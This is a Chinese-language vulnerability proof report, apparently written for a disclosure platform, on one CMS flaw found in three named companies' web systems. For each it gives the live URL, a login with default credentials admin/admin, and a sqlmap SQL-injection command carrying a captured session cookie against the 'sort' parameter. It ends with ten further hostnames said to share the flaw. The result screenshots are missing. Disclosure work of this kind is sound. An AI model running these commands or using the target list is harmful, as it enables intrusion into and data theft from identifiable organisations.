漏洞证明1 深圳市智寻信息技术有限公司 url:http://home.bms16.com:8088/index 漏洞利用步骤:
- 上述访问url进行网站,输入默认用户名密码 admin/admin,进入系统
2.抓取数据包,查看cookie,设置好Cookie丢到sqlmap中去跑,
payload如下
python sqlmap.py -u "home.bms16.com:8088/common/dict/list?sort=1&limit=10&offset=0&type=" --cookie "JSESSIONID=33f53b02-bdae-4d7a-a396-684ff763b263" -p "sort" --level 5
结果如下
深圳市智寻信息技术有限公司资产证明
漏洞证明2 江苏月影东网络科技有限公司 url:http://c-api.yueydong.cn:8090/ 漏洞利用步骤:
- 上述访问url进行网站,输入默认用户名密码 admin/admin,进入系统
2.抓取数据包,查看cookie,设置好Cookie丢到sqlmap中去跑,
payload如下
python sqlmap.py -u "http://c-api.yueydong.cn:8090/common/dict/list?sort=1&limit=10&offset=0&type=" --cookie "JSESSIONID=33f53b02-bdae-4d7a-a396-684ff763b263" -p "sort" --level 5
结果如下
江苏月影东网络科技有限公司资产证明
漏洞证明3 辽宁播之信息科技有限公司 url:http://bozhixinxi.xyz:8083/index 漏洞利用步骤:
- 上述访问url进行网站,输入默认用户名密码 admin/admin,进入系统
2.抓取数据包,查看cookie,设置好Cookie丢到sqlmap中去跑,
payload如下
python sqlmap.py -u "http://bozhixinxi.xyz:8083/common/dict/list?sort=1&limit=10&offset=0&type=" --cookie " JSESSIONID=555b5010-097b-41b6-ba88-c4fb4ad97659" -p "sort" --level 5
结果如下
辽宁播之信息科技有限公司资产证明
其他含有此漏洞的网站 www.yuekan.online mall.zmmit.com wy.zhcx.xyz www.ziyunguang.com xihao.zmmit.com webmail.ibtbt.com autodiscover.ibtbt.com autzmimwwx.ibtbt.com www.ibtbt.com webdisk.ibtbt.com
通过鹰图查看有很多公司用了此CMS,且平台中也有关于此漏洞的先例